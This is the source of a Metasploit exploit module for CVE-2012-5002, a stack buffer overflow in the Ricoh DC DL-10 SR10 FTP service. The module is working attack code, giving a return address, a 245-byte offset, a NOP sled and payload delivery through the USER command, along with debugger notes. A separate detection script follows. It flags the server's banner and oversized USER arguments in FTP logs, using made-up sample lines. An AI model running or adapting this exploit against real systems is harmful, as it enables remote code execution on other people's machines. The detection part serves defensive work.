GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/ricoh_dl_bof.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
          service. By supplying a long string of data to the USER command, it is
          possible to trigger a stack-based buffer overflow, which allows remote code
          execution under the context of the user.

          Please note that in order to trigger the vulnerability, the server must
          be configured with a log file name (by default, it's disabled).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Julien Ahrens', # Discovery, PoC
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['CVE', '2012-5002'],
          ['OSVDB', '79691'],
          ['URL', 'http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/'],
          ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
        ],
        'Payload' => {
          # Yup, no badchars
          'BadChars' => "\x00",
        },
        'DefaultOptions' => {
          'EXITFUNC' => "process",
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP SP3',
            {
              'Ret' => 0x77c35459, # PUSH ESP; RETN (msvcrt.dll)
              'Offset' => 245
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-03-01',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # We're triggering the bug via the USER command, no point to have user/pass
    # as configurable options.
    deregister_options('FTPPASS', 'FTPUSER')
  end

  def check
    connect
    disconnect
    if banner =~ /220 DSC ftpd 1\.0 FTP Server/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    buf = ''
    buf << rand_text_alpha(target['Offset'], payload_badchars)
    buf << [target.ret].pack('V')
    buf << make_nops(20)
    buf << payload.encoded

    print_status("#{rhost}:#{rport} - Sending #{self.name}")
    connect
    send_user(buf)
    handler
    disconnect
  end
end

=begin
0:002> lmv m SR10
start    end        module name
00400000 00410000   SR10       (deferred)
    Image path: C:\Program Files\DC Software\SR10.exe
    Image name: SR10.exe
    Timestamp:        Mon May 19 23:55:32 2008 (483275E4)
    CheckSum:         00000000
    ImageSize:        00010000
    File version:     1.0.0.520
    Product version:  1.0.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Ricoh Co.,Ltd.
    ProductName:      SR-10
    InternalName:     SR-10
    OriginalFilename: SR10.EXE
    ProductVersion:   1, 0, 0, 0
    FileVersion:      1, 0, 0, 520
    PrivateBuild:     1, 0, 0, 520
    SpecialBuild:     1, 0, 0, 520
    FileDescription:  SR-10

Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
stable component we can use is msvcrt.dll for now.
=end
```
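An added detection-side example, not part of the module above or of the Metasploit project: a small Ruby scanner over FTP control-channel log lines that flags the two things this module depends on, the "220 DSC ftpd 1.0 FTP Server" banner its check method fingerprints and a USER argument at or beyond the 245-byte target offset. The log line format (timestamp, direction C/S, client IP, text) and the sample lines are constructed assumptions for this example.

```ruby
# Added example: flag exposed DSC ftpd banners and oversized FTP USER commands.
# Log format assumed here: "<timestamp> <C|S> <client_ip> <text>" (constructed).

VULN_BANNER = /220 DSC ftpd 1\.0 FTP Server/   # banner the module's check() matches
USER_OVERFLOW_LEN = 245                        # 'Offset' from the module's target

# Parse one log line into its fields; returns nil for lines in another shape.
def parse_ftp_line(line)
  m = line.match(/\A(\S+)\s+(C|S)\s+(\S+)\s+(.*)\z/)
  return nil unless m
  { ts: m[1], dir: m[2], ip: m[3], text: m[4] }
end

# Walk the log and collect findings keyed by client IP.
def analyze_ftp_log(lines)
  findings = []
  lines.each do |line|
    rec = parse_ftp_line(line)
    next unless rec
    if rec[:dir] == 'S' && rec[:text] =~ VULN_BANNER
      # A server answering with this banner is what the module's check() looks for.
      findings << { ip: rec[:ip], kind: :vulnerable_banner, detail: rec[:text] }
    elsif rec[:dir] == 'C' && rec[:text] =~ /\AUSER\s+(.*)\z/i
      arg = Regexp.last_match(1)
      if arg.bytesize >= USER_OVERFLOW_LEN
        # Legitimate usernames are nowhere near 245 bytes; this is an overflow attempt.
        findings << { ip: rec[:ip], kind: :oversized_user, detail: "USER argument #{arg.bytesize} bytes" }
      end
    end
  end
  findings
end

# Constructed sample session: one vulnerable banner, one oversized USER, one benign host.
SAMPLE_LOG = [
  "2024-01-01T10:00:00Z S 192.0.2.10 220 DSC ftpd 1.0 FTP Server ready.",
  "2024-01-01T10:00:01Z C 192.0.2.10 USER anonymous",
  "2024-01-01T10:00:02Z C 192.0.2.10 USER #{'A' * 300}",
  "2024-01-01T10:00:03Z S 192.0.2.11 220 vsFTPd 3.0.3",
  "2024-01-01T10:00:04Z C 192.0.2.11 USER alice",
]

analyze_ftp_log(SAMPLE_LOG).each { |f| puts "#{f[:ip]} #{f[:kind]}: #{f[:detail]}" }
```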